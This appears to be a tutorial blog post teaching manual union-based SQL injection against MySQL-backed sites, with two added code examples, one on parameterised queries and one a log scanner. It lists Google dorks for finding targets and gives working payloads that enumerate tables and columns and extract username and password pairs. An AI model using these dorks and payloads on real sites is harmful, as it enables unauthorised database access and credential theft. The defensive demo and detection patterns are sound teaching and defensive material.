SQL Injection
The simple definition: injecting SQL into the database of the target through the application's inputs. The more formal definition, as given by OWASP:
"A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
I will start with testing for SQL injection, as it is the most important part and something you will not find covered anywhere.
Also, you can use the Google dorks below to find sites and check whether they are vulnerable to SQL injection. Most important: don't test any live website without the owner's knowledge and permission unless you have a legal contract.
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
and many more.
We can check for SQL injection by simply using an apostrophe check.
For example, the site is http://www.******.com/index.php?pid=1 (I have starred out the domain, because people usually start targeting the same website without any knowledge, and it can get them into trouble).
I will repeat the same thing once again: "Don't touch any website without the website owner's knowledge." THIS IS ILLEGAL.
Let's start now.
When you append an apostrophe ( ' ) or a backslash ( \ ) to the URL of a website that is vulnerable to this attack, as described above, you will see the error below:
http://www.******.com/index.php?pid=1'
You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to
use near ''1\' LIMIT 0,1' at line 1
You should be happy once you have received this kind of error, because you are getting a message directly from the database. So start communicating with it, use your full knowledge and enjoy.
Now, I will not start like other articles on the internet which say that the apostrophe is just a trick. If you also think it is, then read the following carefully.
Consider the query:
Select name, password from table where id = ' any value '
This query gives a correct result when the value is supplied as it is.
But when you append an apostrophe at the end of the URL, http://www.******.com/index.php?pid=1', you have changed the value to 1', so the resulting query becomes:
Select name, password from table where id = ' 1' '
The problem is that quotes must always occur in pairs; since they no longer do, the error is guaranteed.
As we can see, we control only the part of the query that comes after id, so we can also comment out the rest of the query using -- (followed by a space) or --+ (the + is a URL-encoded space).
e.g.: http://www.******.com/index.php?pid=1' my command area --+
In the "my command area" specified above, I can append any query.
So our first task is to find out how many columns are used in the query behind the URL we are modifying:
http://www.******.com/index.php?pid=1'
We are not sure, but let's assume that the URL above uses a query similar to the one below:
Select name, password from table where id = 1'
We are not sure at all whether it has 1, 2 or more columns.
We can check this by appending an ORDER BY clause to the link above, because ORDER BY gives an error if we mention a column number larger than the number of columns on the left-hand side (the SELECT list) of the ORDER BY.
In simple words: Select name, password from table where id = 1' order by 2 --+
Sometimes, to make our appended query work, we may have to remove the ' after the id value, since we never know how the parameter is integrated into the code; if we remove it, it will work in that case. It depends case by case:
where id = 1 order by 2 --+
If we give order by 3, it should give an error, because the left-hand side of the query has only 2 columns, so how can it display 3?
This is the way we can find the number of columns: the moment it stops showing an error while we change the number after the ORDER BY clause, we can stop and determine the number of columns in that query.
Here we go with the link:
http://www.******.com/index.php?pid=1' order by 4 --+ ' (this apostrophe at the end is commented out by --+). Also, sometimes the parameter is bound as id=1', so in that case we have to remove our ' for our appended command to work.
The format for determining the number of columns should be the same as pid=1' order by 4 --+; the --+ at the end comments out the part of the query that comes after it.
Suppose we found that the number of columns is 3; then we append our UNION query as:
http://www.******.com/index.php?pid=1' union all select 1,2,3 --+
But in the output we won't be able to see the result, because the first part before the UNION is true and it will always show its own result. So we have to make the first part false, forcing the second statement, our UNION statement, to be the one whose result is displayed.
We can do that by giving any invalid value in pid, e.g. pid=99999 or pid=-1 (a negative id value is never used in the database), so that it invalidates the first part and the second part executes. In simple words, we give a false value in the pid field, so that the values 1,2,3 appear at the places where the output of the actual statement was shown earlier.
Now we can use these values 1,2,3 as placeholders and put our own expressions in these places to learn about the database.
e.g. we can replace them with database(), version(), @@version and much more. We will get the value of whatever we query.
http://www.******.com/index.php?pid=1' union all select 1,2,3 --+
So we will just replace the value 2 in the query above with any of the expressions mentioned.
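To show why the apostrophe, the ORDER BY probe and the UNION placeholders behave exactly as described above, and what stops them, here is an added example that is not code from the original post. It uses SQLite (standing in for the MySQL backend the article talks about) with a constructed products table; the two lookup functions differ only in whether the pid parameter is pasted into the SQL text or bound as a parameter. The "--" plays the role of "--+" (the + is a URL-encoded space).

```python
import sqlite3

# Added example, not code from the original post. SQLite stands in for the
# MySQL backend the article targets; the products table and its rows are
# constructed sample data.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "widget", "9.99"), (2, "gadget", "19.99")])
    return conn

def lookup_vulnerable(conn, pid):
    # The construct the article exploits: the request parameter is pasted into
    # the SQL text, so quotes, ORDER BY and UNION in the value become SQL.
    sql = "SELECT id, name, price FROM products WHERE id = '" + pid + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, pid):
    # Parameterised form: the driver binds pid as a value, never as SQL text,
    # so "1'" is just a string that matches no row.
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return conn.execute(sql, (pid,)).fetchall()

def probe(conn, fn, pid):
    # Run one lookup and report either the rows or the database error text
    # (the error is what the article tells you to look for).
    try:
        return ("rows", fn(conn, pid))
    except sqlite3.Error as exc:
        return ("error", str(exc))

def run_demo():
    # The article's probes, in order, against both query styles.
    conn = make_db()
    return {
        "apostrophe":        probe(conn, lookup_vulnerable, "1'"),
        "order_by_4":        probe(conn, lookup_vulnerable, "1' order by 4 --"),
        "order_by_3":        probe(conn, lookup_vulnerable, "1' order by 3 --"),
        "union_placeholder": probe(conn, lookup_vulnerable, "-1' union all select 1,2,3 --"),
        "safe_apostrophe":   probe(conn, lookup_safe, "1'"),
        "safe_union":        probe(conn, lookup_safe, "-1' union all select 1,2,3 --"),
        "safe_normal":       probe(conn, lookup_safe, "1"),
    }

if __name__ == "__main__":
    for label, result in run_demo().items():
        print(f"{label:18} -> {result}")
```

Against the concatenated query, "1'" produces an unterminated-string error (the unpaired quote), "order by 4" errors because the SELECT list has only three columns while "order by 3" does not, and the "-1' union all select 1,2,3" probe returns the row (1, 2, 3) in place of the real product. Against the parameterised query every one of those inputs simply matches nothing, while a normal id still works; the fix for the whole class of issue on this page is the bound parameter, not input filtering.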
For finding table names we will replace it like the following:
pid=-2' union all select 1,table_name,3 from information_schema.tables--+
or, in case you want it from a specific database:
id=-2' union all select 1,table_name,3 from information_schema.tables where table_schema=database()--+
or we can mention the database name in quotes, like below:
id=-2' union all select 1,table_name,3 from information_schema.tables where table_schema='my database name' --+
But there will be many tables in that database, so we can use limit 0,1 to find the tables one at a time; each time we increment the first number after limit and get the next table name, as below:
id=-2' union all select 1,table_name,3 from information_schema.tables where table_schema='my database name' limit 0,1 --+
id=-2' union all select 1,table_name,3 from information_schema.tables where table_schema='my database name' limit 1,1--+
and so on. But this is a very tedious way to find the table names, so if we want all the table names at once we go with the group_concat approach.
We will use group_concat(table_name) to get all the table names:
id=-2' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
If we do not use the where clause "where table_schema=database()", then in most cases it leads to displaying only the default tables of information_schema.
Now I can proceed with finding the column names; here I will just replace tables with columns:
id=-2' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+
But if I am interested in the columns of one particular table, then I can simply put that table name:
id=-2' union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='any table name'
Now I have the table name and the column names, so it is time to proceed with finding the data as well.
So I will just do a simple query in the same field, as below. There is no need for information_schema any more, as I now know the table name and the column names:
id=-2' union all select 1,group_concat(password,0x3a,username),3 from tablename--+
0x3a gives the : in the output, so as to separate the username and the password.
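Every step on this page leaves a distinctive trace in the web server's access log: a parameter value ending in a lone apostrophe, then "order by N", then "union ... select" with information_schema, all terminated by "--+". The following added example (my own code, not from the original post) decodes the query string of combined-format log lines and tags parameter values that match those probes; the log lines and IP addresses are constructed, and the regexes are signatures I wrote for exactly the sequence described above, not a vendor ruleset.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Added example, not from the original post. The signatures are my own
# regexes for the probes the article walks through; the log lines below are
# constructed (Apache/nginx "combined" style) with made-up addresses.

SIGNATURES = [
    ("sqli.syntax_probe", re.compile(r"^[^']*'\s*$")),                 # value ends in a lone apostrophe
    ("sqli.order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),  # column counting
    ("sqli.union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("sqli.information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("sqli.comment_terminator", re.compile(r"--|#|/\*")),              # trailing -- / --+
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return [(param, value, [tags])] for every query parameter that looks like a probe."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qsl decodes %27 -> ' and + -> space, so "--+" becomes "-- ".
    for name, value in parse_qsl(query, keep_blank_values=True):
        tags = [tag for tag, rx in SIGNATURES if rx.search(value)]
        if tags:
            hits.append((name, value, tags))
    return hits

def scan(lines):
    """Flag (line number, parameter, tags) for each suspicious parameter in the log."""
    return [(n, name, tags)
            for n, line in enumerate(lines, 1)
            for name, _value, tags in scan_line(line)]

SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?pid=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?pid=1%27 HTTP/1.1" 500 318',
    '203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /index.php?pid=1%27+order+by+4+--+ HTTP/1.1" 500 318',
    '203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?pid=-1%27+union+all+select+1,group_concat(table_name),3+from+information_schema.tables+--+ HTTP/1.1" 200 944',
    '198.51.100.7 - - [10/Oct/2023:13:57:01 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, name, tags in scan(SAMPLE_LOG):
        print(f"line {n}: {name} -> {', '.join(tags)}")
```

The first line (a normal request) and the last (an apostrophe inside a name) produce nothing, while lines 2 to 4 are tagged in the same order the article's probing progresses. Two caveats: the 500 status on the apostrophe probe is the verbose database error the page tells the reader to look for, so suppressing detailed SQL errors in production removes that signal; and the comment-terminator pattern alone is weak, since "--" can occur in legitimate values, so treat it as supporting evidence next to the UNION or information_schema hits rather than as an alert by itself.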